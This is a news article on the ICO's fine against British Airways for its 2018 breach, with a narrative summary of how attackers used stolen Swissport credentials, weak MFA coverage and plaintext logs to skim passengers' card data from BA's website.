British Airways has been fined the equivalent of CA$34 million for a 2018 data breach that affected more than 490,000 passengers and BA employees around the world.
The Information Commissioner’s Office (ICO) announced the fine Friday, saying the failure to protect personal data under the new European General Data Protection Regulation (GDPR) was “unacceptable,” resulting in the biggest financial penalty levied by the regulator.
“People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure,” Information Commissioner Elizabeth Denning said in a statement. “Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result.”
It was less than the CA$300 million proposed last year. In its decision, the ICO said the fine might have been higher had it not been for the financial impact of the COVID-19 crisis.
The attack could be considered a classic example of a third-party supply chain attack. On June 22, 2018, an unnamed attacker used a username and password of a Trinidad-based employee of BA’s cargo handler, Swissport, to access the airlines’ Citrix remote access gateway and its IT system. Eventually, the attacker edited a Javascript file on BA’s website to allow the copying of passengers’ cardholder data to a phony lookalike domain where it was captured.
Among the things the commissioner considered was that it was unclear if the airline would have ever detected the breach. An unnamed third party notified BA that data was being exfiltrated and the attack stopped on September 5, 2018. The ICO also concluded that “BA was negligent in maintaining operating systems which suffered from … significant vulnerabilities and shortcomings.”
“A company the size and profile of BA is expected to be aware that it is likely to be targeted by attackers, sophisticated or otherwise. BA must be aware that the nature of its business involves processing large volumes of personal data, including sensitive personal data,” the ICO noted. “The risk of any compromise of that information may have significant consequences for BA’s customers and its own business. In view of these factors, the Commissioner would have expected BA to have taken appropriate steps or a combination of appropriate steps to secure the personal data of its customers.”
But the airline didn’t take all appropriate measures, the report concludes.
The full report details the attack but certain information is blanked out, presumably to keep potential attackers from exploiting the airlines’ infrastructure. Briefly, the Swissport credential used by the attacker was one of five that had somehow been obtained. The Citrix login system allowed access to 243 applications, of which 13 weren’t protected with multi-factor authentication.
BA has a policy requiring MFA for all remote network access. The report says BA hasn’t provided a satisfactory explanation of why some applications didn’t have to comply with the MFA policy. BA’s response to a query from the ICO on this has been blacked out.
It isn’t clear how the attacker was able to break out of the Citrix environment to get BA’s wider network. The airline has a theory, but that’s one of the blacked-out sections. However, the suggestion is the attacker copied a number of tools into the Citrix environment.
Once out the attacker roamed around until they were able to get the credentials of a privileged domain administrator account whose login details were stored in plaintext. Then the attacker got hold of credentials of a database system admin and logged into several servers, presumably, says the report, looking for valuable data. What they came across were plaintext log files with payment card details for BA redemption transactions, including some CVV numbers. This was apparently test data that was supposed to be encrypted. Capturing this data had been automatically going on since 2015.
Fortunately, the report says, the file only held the previous 95 days of transactions. Unfortunately, that amounted to 108,000 payment cards.
Ultimately the attacker was able to compromise the BA website where passengers bought tickets online and skimmed their card information.
The attacker could have accessed information on 490,000 individuals, including name, address, card numbers and CVV numbers of 244,000 people; 77,000 card and CVV numbers; 108,000 card numbers only; usernames and passwords of BA employees; and usernames and PIN numbers of 612 BA Executive Club accounts.